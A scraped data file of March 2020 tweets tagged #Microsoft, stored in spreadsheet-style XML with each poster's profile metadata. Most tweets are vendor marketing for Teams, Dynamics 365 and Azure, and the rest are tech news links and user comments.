    <t>{'id': 506872472, 'id_str': '506872472', 'name': 'Enterprise Technology International', 'screen_name': 'enterpriseti', 'location': 'Denver, CO', 'description': 'ETI is a Cloud Services and IT Solutions Provider. Cloud Computing, Converged Infrastructure, Mobility, Networking, Security, Storage, and Virtualization.', 'url': 'http://t.co/UcuBpF7LH7', 'entities': {'url': {'urls': [{'url': 'http://t.co/UcuBpF7LH7', 'expanded_url': 'http://www.enterpriseti.com', 'display_url': 'enterpriseti.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 196, 'friends_count': 193, 'listed_count': 255, 'created_at': 'Tue Feb 28 04:22:57 +0000 2012', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 20541,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'http://pbs.twimg.com/profile_images/1111712594136453120/n1vgUnu9_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1111712594136453120/n1vgUnu9_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/506872472/1556561634',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</si>
  <si>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00:11:11 +0000 2020</t>
  </si>
  <si>
    <t>For #SMBs, moving to the #cloud is proven to help achieve greater profit margins and ROI. Check out this informative infographic to see why it's a game changer.      #Microsoft #Technology #BusinessAutomation #accounting #MSDyn365 https://t.co/X3gbDC3DMc</t>
  </si>
  <si>
    <t>{'id': 948763337063411713, 'id_str': '948763337063411713', 'name': 'Luxfield Technology Solutions', 'screen_name': 'LuxfieldTS', 'location': 'Bundaberg, Queensland', 'description': '(formerly known as Luxfield Communications)\n\n1300 LUXFIELD (589 343) -   Bundaberg - Maryborough - Hervey Bay - Providing local expertise since 1988', 'url': 'https://t.co/trgY4wvzxy', 'entities': {'url': {'urls': [{'url': 'https://t.co/trgY4wvzxy', 'expanded_url': 'https://luxfield.lll-ll.com/', 'display_url': 'luxfield.lll-ll.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 66, 'friends_count': 550, 'listed_count': 2, 'created_at': 'Thu Jan 04 03:49:41 +0000 2018', 'favourites_count': 10, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 718,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'http://pbs.twimg.com/profile_images/1100902471570927616/PaWVaC4t_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1100902471570927616/PaWVaC4t_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/948763337063411713/1577144802',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</si>
  <si>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Tue Mar 03 00:11:01 +0000 2020</t>
  </si>
  <si>
    <t>Why do governments partner with a specific digital provider? It comes down to 4 main reasons. Learn why public digital transformation works best when powered by #Microsoft. https://t.co/IRCn3mSPLa</t>
  </si>
  <si>
    <t>Tue Mar 03 00:10:08 +0000 2020</t>
  </si>
  <si>
    <t>#google and #microsoft just canceled two small conferences ahead of their major ones https://t.co/ZpIwLyiRI8 https://t.co/hNq7ixKclY</t>
  </si>
  <si>
    <t>Tue Mar 03 00:08:34 +0000 2020</t>
  </si>
  <si>
    <t>Hendrick Motorsports drives faster NASCAR performance with high-speed communication using #Microsoft #Teams. Watch the video to learn how. https://t.co/WVguSZSUH1</t>
  </si>
  <si>
    <t>Tue Mar 03 00:08:33 +0000 2020</t>
  </si>
  <si>
    <t>OMG! Its 2020 why does it take three hours for a Xbox game to update!  Im on freaking fiber.  Hey #MicroSoft get your shit together!</t>
  </si>
  <si>
    <t>{'id': 22311558, 'id_str': '22311558', 'name': 'True Patriot', 'screen_name': 'bissel', 'location': 'Covington, LA', 'description': 'Constitutional Conservative, Nationalist, Patriot, Actor and comedian who wants America to be the best! #MAGA #Patriot #ProudAmerican', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 718, 'friends_count': 1418, 'listed_count': 0, 'created_at': 'Sun Mar 01 00:02:30 +0000 2009', 'favourites_count': 404, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1176,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'http://pbs.twimg.com/profile_images/1226149546792804352/QZPRXXsW_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1226149546792804352/QZPRXXsW_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/22311558/1581171655', 'profile_link_color': 'FF0000',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</si>
  <si>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Tue Mar 03 00:07:50 +0000 2020</t>
  </si>
  <si>
    <t>Hendrick Motorsports drives faster NASCAR performance with high-speed communication using #Microsoft #Teams. Watch the video to learn how. https://t.co/Kb5jjT6vbJ</t>
  </si>
  <si>
    <t>Tue Mar 03 00:06:42 +0000 2020</t>
  </si>
  <si>
    <t>How can you help students tackle the complex challenges of tomorrow? See how educators are transforming learning through student-centered approaches. #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/EdYEC0I2GU</t>
  </si>
  <si>
    <t>Tue Mar 03 00:06:40 +0000 2020</t>
  </si>
  <si>
    <t>"Our generation all have phones in their pockets, so Teams is the future." (Sindri Smarason, Cast House Operator, Alcoa). See how #Microsoft #Teams is providing a new generation of communication tools for a new generation of Alcoa workers. https://t.co/V2K0GAXAKC</t>
  </si>
  <si>
    <t>Tue Mar 03 00:06:38 +0000 2020</t>
  </si>
  <si>
    <t>How can you help students tackle the complex challenges of tomorrow? See how educators are transforming learning through student-centered approaches. #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/VZHQdCZ979</t>
  </si>
  <si>
    <t>Tue Mar 03 00:06:08 +0000 2020</t>
  </si>
  <si>
    <t>In the old days, @CliftonCoffeeRoasters had to print, scan, and fill out documents by hand. But since switching to #Teamworksolutions from #Microsoft, their employees work together on documents in a digital workspace. Check out this video for more. https://t.co/E8HVlK4JzJ</t>
  </si>
  <si>
    <t>{'id': 2275121520, 'id_str': '2275121520', 'name': 'Lorne Rogers', 'screen_name': 'lorne_rogers', 'location': 'Calgary, Alberta', 'description': '#Management Consulting, #IT Leadership, #Program Management, #Enterprise, #Solutions Architecture - #EDM, #SharePoint, #ERP, #Dynamics, #CRM, #O365, #Office365', 'url': 'http://t.co/xxegSktRzL', 'entities': {'url': {'urls': [{'url': 'http://t.co/xxegSktRzL', 'expanded_url': 'http://ariaconsulting.net', 'display_url': 'ariaconsulting.net', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 477, 'friends_count': 774, 'listed_count': 10, 'created_at': 'Fri Jan 03 21:26:05 +0000 2014', 'favourites_count': 7, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2401,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'http://pbs.twimg.com/profile_images/799998334496690176/5k8M4LdS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/799998334496690176/5k8M4LdS_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2275121520/1556484636',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</si>
  <si>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Tue Mar 03 00:06:03 +0000 2020</t>
  </si>
  <si>
    <t>Is your business in need of an updated communication platform? How about an easier way for employees to exchange ideas and drive innovation? Check out this video to see how #Teamworksolutions from #Microsoft can help your teams better communicate. https://t.co/VvhKIjj3PR</t>
  </si>
  <si>
    <t>Tue Mar 03 00:05:39 +0000 2020</t>
  </si>
  <si>
    <t>Did you know that #AI is a core part of #Microsoft Dynamics 365 Business Central? Learn how #SMBs can work smarter and faster with the power of #AI.     #Technology #ArtificialIntelligence #MSDyn365 https://t.co/t0mDP5Xo8T</t>
  </si>
  <si>
    <t>Tue Mar 03 00:05:09 +0000 2020</t>
  </si>
  <si>
    <t>Did you know that 4 out of 5 of Fortune 500 companies have #Office365 and that it integrates with #MSDyn365? Read the eBook and learn more about the power behind these tools.    #Technology #ArtificialIntelligence #Microsoft #SMBs https://t.co/23vJoNlFR8</t>
  </si>
  <si>
    <t>{'id': 586702863, 'id_str': '586702863', 'name': 'Infochola Singapore', 'screen_name': 'Infochola', 'location': 'Singapore', 'description': 'We are a Microsoft Gold Partner based in #singapore, specialized in #Clouds, #CyberSecurity #digitaltransformation and #itmanagedservices.', 'url': 'http://t.co/uzIIztxFQ7', 'entities': {'url': {'urls': [{'url': 'http://t.co/uzIIztxFQ7', 'expanded_url': 'http://www.infochola.com', 'display_url': 'infochola.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 645, 'friends_count': 886, 'listed_count': 48, 'created_at': 'Mon May 21 15:14:58 +0000 2012', 'favourites_count': 96, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1801,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'http://pbs.twimg.com/profile_images/1079551064720830464/_cLeNvnG_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1079551064720830464/_cLeNvnG_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/586702863/1540867327',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</si>
  <si>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00:05:04 +0000 2020</t>
  </si>
  <si>
    <t>Lots of hype for the new Microsoft Duo. The Surface has been an excellent device, lets hope this follows suit.
#Microsoft #MicrosoftDuo #MSFT #Tablet #Fablet
https://t.co/NxdHfW2c7l</t>
  </si>
  <si>
    <t>Tue Mar 03 00:03:48 +0000 2020</t>
  </si>
  <si>
    <t>Don't be fooled. #Cloud and on-premise ERP solutions might look identical, yet there are often costs below the surface. This free TCO Iceberg Infographic explains:    #Microsoft #Technology #BusinessAutomation #accounting #MSDyn365 https://t.co/RWQz6U2xrC</t>
  </si>
  <si>
    <t>{'id': 735727729543286784, 'id_str': '735727729543286784', 'name': '3ELM Consulting', 'screen_name': '3ELMConsulting', 'location': 'Calgary, Alberta', 'description': 'Young entrepreneurs riding the wave &amp; innovating for a better tomorrow. Evolving Knowledge| Envisioning Solutions | Embracing Change', 'url': 'https://t.co/W0i6iTUwNQ', 'entities': {'url': {'urls': [{'url': 'https://t.co/W0i6iTUwNQ', 'expanded_url': 'http://www.3elmconsulting.com', 'display_url': '3elmconsulting.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 49, 'friends_count': 110, 'listed_count': 2, 'created_at': 'Thu May 26 07:02:14 +0000 2016', 'favourites_count': 29, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 114, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/864265333707649024/Ops2CgnO_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/864265333707649024/Ops2CgnO_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/735727729543286784/1494275384',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</si>
  <si>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Tue Mar 03 00:03:42 +0000 2020</t>
  </si>
  <si>
    <t>I really enjoy hot Sony #Microsoft</t>
  </si>
  <si>
    <t>Tue Mar 03 00:01:22 +0000 2020</t>
  </si>
  <si>
    <t>Setting a simple standard: Using MQTT at the edge https://t.co/3XQvXMaxXD
For more info: https://t.co/ivErRrEiGo #data #security #bigdata #Digitaltransformation #finance #cloud #cybersecurity #CEO #cmo #digital #marketing #microsoft #IOT #internetofthings #dell #cto #business https://t.co/UeaqbTjXLp</t>
  </si>
  <si>
    <t>Tue Mar 03 00:00:53 +0000 2020</t>
  </si>
  <si>
    <t>Discover how #Microsoft technology is used to analyze young Braylon O'Neill's gait mechanics, enabling him to do more and achieve more. https://t.co/v5qZPepeCC</t>
  </si>
  <si>
    <t>{'id': 3165950778, 'id_str': '3165950778', 'name': 'HPSI', 'screen_name': 'cloudHPSI', 'location': 'Honolulu, Hawaiâ€˜i ', 'description': 'Dedicated IT Vendor with 25 years of experience Innovating &amp; Executing Modern IT Strategy â€“ teamed up with industry leaders to kÅkua your business needs!', 'url': 'http://t.co/WqKHtvWp8w', 'entities': {'url': {'urls': [{'url': 'http://t.co/WqKHtvWp8w', 'expanded_url': 'http://www.hpsi.net', 'display_url': 'hpsi.net', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 101, 'friends_count': 306, 'listed_count': 48, 'created_at': 'Mon Apr 20 23:07:32 +0000 2015', 'favourites_count': 696, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1323,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'http://pbs.twimg.com/profile_images/880884278925565952/rP34ZX7y_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/880884278925565952/rP34ZX7y_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3165950778/1513299354', 'profile_link_color': '740202',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</si>
  <si>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Tue Mar 03 00:00:39 +0000 2020</t>
  </si>
  <si>
    <t>[Archive] Connecting to Exchange Online with PowerShell https://t.co/vQ0BL2cTOG #cloud #exchangeonline #microsoft #office</t>
  </si>
  <si>
    <t>Mon Mar 02 23:52:56 +0000 2020</t>
  </si>
  <si>
    <t>#AWS, #IBM and #Azure Top-Ranked in Big Data Study https://t.co/K0pJOOyTFQ #Amazon #Microsoft</t>
  </si>
  <si>
    <t>Mon Mar 02 23:49:38 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve">https://t.co/9pN792uzHr
This is not a hoax... This is not a drill
#Microsoft #WuhanCoronaVirus #CoronaVirus #COVID19 #PublicHealth #Medicine #MedicalDoctor #Epidemiology #CDC #WHO #HealthCare #China #USA </t>
  </si>
  <si>
    <t>{'id': 16273556, 'id_str': '16273556', 'name': 'Dr. Marion Thorpe ðŸ‡ºðŸ‡¸', 'screen_name': 'MarionThorpe', 'location': 'Florida', 'description': "State of Florida Chief Medical Officer (former). MEDICAL DOCTOR with a passion for the US Constitution and American Dream. United We Stand: Let's Heal America!", 'url': 'https://t.co/h6LBz9hT8S', 'entities': {'url': {'urls': [{'url': 'https://t.co/h6LBz9hT8S', 'expanded_url': 'https://www.facebook.com/HealAmerica', 'display_url': 'facebook.com/HealAmerica', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1633, 'friends_count': 1613, 'listed_count': 104, 'created_at': 'Sat Sep 13 17:10:00 +0000 2008', 'favourites_count': 4205, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 25874,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'http://pbs.twimg.com/profile_images/664226293630803968/LO4crJ73_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/664226293630803968/LO4crJ73_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/16273556/1454149736', 'profile_link_color': 'A3A4D1', 'profile_sidebar_border_color': '87BC44', 'profile_sidebar_fill_color': '050029', 'profile_text_color': 'F70511', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Mon Mar 02 23:48:49 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft on Monday announced a private preview of its Universal Print service. The service eliminates the need to maintain print servers on-premises or install printer drivers. https://t.co/JRAQcR9LRo</t>
  </si>
  <si>
    <t>Mon Mar 02 23:45:13 +0000 2020</t>
  </si>
  <si>
    <t>.NET Core 3.0 'Dies' Tomorrow https://t.co/FNNq7pse8l #dotnetcore #Microsoft</t>
  </si>
  <si>
    <t>{'id': 30327369, 'id_str': '30327369', 'name': 'VisualStudioMagazine', 'screen_name': 'VSMdev', 'location': 'U.S.A.', 'description': 'Official Twitter account for Visual Studio Magazine. Offering enterprise solutions for .NET development.', 'url': 'http://t.co/AfLGcT7TyC', 'entities': {'url': {'urls': [{'url': 'http://t.co/AfLGcT7TyC', 'expanded_url': 'http://visualstudiomagazine.com', 'display_url': 'visualstudiomagazine.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 8986, 'friends_count': 279, 'listed_count': 398, 'created_at': 'Fri Apr 10 22:18:07 +0000 2009', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5606, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '171B1C', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1923701769/Twitter_logo_visualstudio_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1923701769/Twitter_logo_visualstudio_normal.jpg', 'profile_link_color': '999999', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '829EBA', 'profile_text_color': '000000', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Mon Mar 02 23:45:08 +0000 2020</t>
  </si>
  <si>
    <t>#google and #microsoft just canceled two small conferences ahead of their major ones https://t.co/1g14JLS3IE https://t.co/yDixMV6cwh</t>
  </si>
  <si>
    <t>Mon Mar 02 23:44:03 +0000 2020</t>
  </si>
  <si>
    <t>Used PowerPoint after a long time and am genuinely impressed by smart design recommendations.
 #Microsoft. Please dont ruin it.</t>
  </si>
  <si>
    <t>{'id': 925801956362272768, 'id_str': '925801956362272768', 'name': 'Desi Nomad', 'screen_name': 'deehaw_beniaz', 'location': 'Seattle, WA', 'description': 'Mom - Foodie - Pakistani expat to Canadian expat', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 196, 'friends_count': 492, 'listed_count': 0, 'created_at': 'Wed Nov 01 19:09:21 +0000 2017', 'favourites_count': 29262, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 8734,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'http://pbs.twimg.com/profile_images/1048708191675023360/AoL7yrxZ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1048708191675023360/AoL7yrxZ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/925801956362272768/1538866558',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</si>
  <si>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23:41:30 +0000 2020</t>
  </si>
  <si>
    <t>Aiming to eliminate the need to maintain print servers on-premises or install printer drivers, #Microsoft on Monday announced a private preview of its Universal Print service. https://t.co/GHBEEjFGsW</t>
  </si>
  <si>
    <t>Mon Mar 02 23:36:47 +0000 2020</t>
  </si>
  <si>
    <t>The #Apple and #Microsoft surge, adding a combined $193 billion in market value today.</t>
  </si>
  <si>
    <t>{'id': 19651092, 'id_str': '19651092', 'name': 'MrTopStep', 'screen_name': 'MrTopStep', 'location': 'Chicago, IL', 'description': 'The information in these Market Commentaries do not constitute a solicitation of the purchase or sale of any futures or options contracts.', 'url': 'http://t.co/P8D0VyzC0J', 'entities': {'url': {'urls': [{'url': 'http://t.co/P8D0VyzC0J', 'expanded_url': 'http://www.mrtopstep.com/', 'display_url': 'mrtopstep.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 25346, 'friends_count': 414, 'listed_count': 1206, 'created_at': 'Wed Jan 28 13:26:49 +0000 2009', 'favourites_count': 3176, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 219028, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'E9ECF1', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/378800000264951777/fdcb2fffc58110f966d01c65c5daf7df_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000264951777/fdcb2fffc58110f966d01c65c5daf7df_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/19651092/1354206197',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</si>
  <si>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Mon Mar 02 23:34:48 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft + AT&amp;amp;T Partnership delivers #5G #NetworkEdgeCompute Technology
 #Gaming #iot #Microsoft #NEC
https://t.co/E9XbXrYlen</t>
  </si>
  <si>
    <t>Mon Mar 02 23:31:56 +0000 2020</t>
  </si>
  <si>
    <t>#Azure is bringing a whole new meaning to the word "seamless" at fast fashion firm #Lindex as they roll out a new app. #Microsoft https://t.co/1R6VJiSSjf</t>
  </si>
  <si>
    <t>Mon Mar 02 23:31:09 +0000 2020</t>
  </si>
  <si>
    <t>Get ready to take down enemies with a vast array of weaponry and see cool graphics in Call of Duty Modern Warfare 3 https://t.co/TNzwpdFp2B #microsoft #xbox #xbox360 #gaming #fps https://t.co/QCGeOQdBFb</t>
  </si>
  <si>
    <t>Mon Mar 02 23:30:10 +0000 2020</t>
  </si>
  <si>
    <t>Whether you are looking for low/high complexity or low/high velocity, here are all of the exciting #office365 features currently available at your fingertips. https://t.co/ok2Fe21hpR #Microsoft https://t.co/tpiVJwPqiq</t>
  </si>
  <si>
    <t>{'id': 968723167878541312, 'id_str': '968723167878541312', 'name': 'Randy Cunningham', 'screen_name': 'Randy_NuTechSol', 'location': 'Eagle River, AK', 'description': "I I've been an IT Professional for over 20 years; specializing in remote support and managed services for the last 10 years. I enjoy helping people with IT", 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 33, 'friends_count': 430, 'listed_count': 0, 'created_at': 'Wed Feb 28 05:42:56 +0000 2018', 'favourites_count': 8088, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 539, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/969294362579382272/PO9cUnr-_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/969294362579382272/PO9cUnr-_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/968723167878541312/1519932778',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</si>
  <si>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23:28:45 +0000 2020</t>
  </si>
  <si>
    <t>What were #MicroSoft thinking? #Windows 8.1 is entirely unintuitive by moving away from nested hierarchy categories thats universal in all human organisation.</t>
  </si>
  <si>
    <t>{'id': 3148481723, 'id_str': '3148481723', 'name': 'VoteJonty', 'screen_name': 'Vote4Jonty', 'location': 'NorthWest England', 'description': 'Vote #Jonty4Preston - let me help YOU get more for YOUR money the Council take from you (Including the Â£1000s you pay Councillors!) #VoteJonty', 'url': 'https://t.co/VMLsr6qlyz', 'entities': {'url': {'urls': [{'url': 'https://t.co/VMLsr6qlyz', 'expanded_url': 'https://www.jordanbpeterson.com', 'display_url': 'jordanbpeterson.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 121, 'friends_count': 486, 'listed_count': 1, 'created_at': 'Wed Apr 08 16:37:24 +0000 2015', 'favourites_count': 83, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 7070,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'http://pbs.twimg.com/profile_images/1214130746463526914/lRM3cTOI_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1214130746463526914/lRM3cTOI_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3148481723/1524153223',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</si>
  <si>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23:20:36 +0000 2020</t>
  </si>
  <si>
    <t>How can you help students tackle the complex challenges of tomorrow? See how educators are transforming learning through student-centered approaches. #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/gKwpyJmVBc</t>
  </si>
  <si>
    <t>Mon Mar 02 23:15:48 +0000 2020</t>
  </si>
  <si>
    <t>How can you help students tackle the complex challenges of tomorrow? See how educators are transforming learning through student-centered approaches. #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/XUQZZeXK2r</t>
  </si>
  <si>
    <t>Mon Mar 02 23:15:28 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft is retiring its MCSA, MCSD and MCSE certifications in June 2020 | ZDNet https://t.co/XPTWC2CV6e #microsoft @MCSE #MSCD #MSCA #certifications #retiring</t>
  </si>
  <si>
    <t>{'id': 2367320131, 'id_str': '2367320131', 'name': 'Bob Carver âœ­', 'screen_name': 'cybersecboardrm', 'location': 'the world', 'description': 'Twitter Top10 #CyberSecurity #infosec #IoT #privacy #AI #ML #disrupt #blockchain #Industry40 #startups #Cloud #FutureOfWork #technology #Speaker RT != agree', 'url': 'https://t.co/ezDJA2l40q', 'entities': {'url': {'urls': [{'url': 'https://t.co/ezDJA2l40q', 'expanded_url': 'https://www.linkedin.com/in/bobcarver/detail/recent-activity/posts/', 'display_url': 'linkedin.com/in/bobcarver/dâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 45162, 'friends_count': 18949, 'listed_count': 2381, 'created_at': 'Sat Mar 01 16:45:26 +0000 2014', 'favourites_count': 17445, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 81525,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'http://pbs.twimg.com/profile_images/1063596549521850369/aGTtpFEP_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1063596549521850369/aGTtpFEP_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2367320131/1501185970',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</si>
  <si>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23:15:13 +0000 2020</t>
  </si>
  <si>
    <t>More than 30% of businesses use advanced communication tools in conference rooms. Want to find the #teamworksolution that's right for your business? Check out this infographic to see the latest #Microsoft solutions available to your team. https://t.co/TPyvdOkZfj</t>
  </si>
  <si>
    <t>Mon Mar 02 23:15:01 +0000 2020</t>
  </si>
  <si>
    <t>86% of executives blame a lack of teamwork for team problems and failures. Yikes! Check out this infographic for more on how #Teamworksolutions from #Microsoft allow you to work with anyone, inside or outside your business. https://t.co/3dx8uwAxW7</t>
  </si>
  <si>
    <t>{'id': 93669801, 'id_str': '93669801', 'name': 'US Medical IT', 'screen_name': 'usmedicalit', 'location': 'Allen, Texas', 'description': 'US Medical IT provides the highest quality information technology services designed for the healthcare industry.', 'url': 'http://t.co/OsCl7Ou1DD', 'entities': {'url': {'urls': [{'url': 'http://t.co/OsCl7Ou1DD', 'expanded_url': 'http://www.usmedicalit.com', 'display_url': 'usmedicalit.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 366, 'friends_count': 328, 'listed_count': 109, 'created_at': 'Mon Nov 30 17:05:50 +0000 2009', 'favourites_count': 496, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1956,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'http://pbs.twimg.com/profile_images/378800000674873473/86f448efb3adaae4100eb11a68e41f8f_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000674873473/86f448efb3adaae4100eb11a68e41f8f_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/93669801/1521683147',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</si>
  <si>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23:14:43 +0000 2020</t>
  </si>
  <si>
    <t>In the old days, @CliftonCoffeeRoasters had to print, scan, and fill out documents by hand. But since switching to #Teamworksolutions from #Microsoft, their employees work together on documents in a digital workspace. Check out this video for more. https://t.co/P9DpTmLt3G</t>
  </si>
  <si>
    <t>{'id': 3061710191, 'id_str': '3061710191', 'name': 'TeraCloud', 'screen_name': 'TeraCloudInc', 'location': 'Texas, USA', 'description': '', 'url': 'https://t.co/COVljQGZW8', 'entities': {'url': {'urls': [{'url': 'https://t.co/COVljQGZW8', 'expanded_url': 'http://www.teracloud.us', 'display_url': 'teracloud.us', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 62, 'friends_count': 132, 'listed_count': 5, 'created_at': 'Wed Feb 25 11:42:50 +0000 2015', 'favourites_count': 4, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2813,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'http://pbs.twimg.com/profile_images/1130524873225330688/TXb3-JkS_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1130524873225330688/TXb3-JkS_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3061710191/1471804069',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</si>
  <si>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23:13:44 +0000 2020</t>
  </si>
  <si>
    <t>How can you help students tackle the complex challenges of tomorrow? See how educators are transforming learning through student-centered approaches. #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/rQ56TSUM7d</t>
  </si>
  <si>
    <t>Mon Mar 02 23:11:57 +0000 2020</t>
  </si>
  <si>
    <t>Here's how we manage privileged identities for on-premises and #Azure at Microsoft. #AAD #Microsoft #security #MicrosoftSecurity #MSFTAdvocate https://t.co/4dYCxPL7tf</t>
  </si>
  <si>
    <t>{'id': 25021147, 'id_str': '25021147', 'name': 'Rory Quinn', 'screen_name': 'roryquinn24', 'location': 'Melbourne, Victoria', 'description': 'Leading digital transformation in Higher Education, sports fan and child wrangler.  Views expressed are my own.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 88, 'friends_count': 297, 'listed_count': 1, 'created_at': 'Wed Mar 18 03:35:16 +0000 2009', 'favourites_count': 317, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 791,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'http://pbs.twimg.com/profile_images/1093059246919364610/VqKC-FQY_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1093059246919364610/VqKC-FQY_normal.jpg',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</si>
  <si>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23:11:31 +0000 2020</t>
  </si>
  <si>
    <t>86% of executives blame a lack of teamwork for team problems and failures. Yikes! Check out this infographic for more on how #Teamworksolutions from #Microsoft allow you to work with anyone, inside or outside your business. https://t.co/SCFSjp9imm</t>
  </si>
  <si>
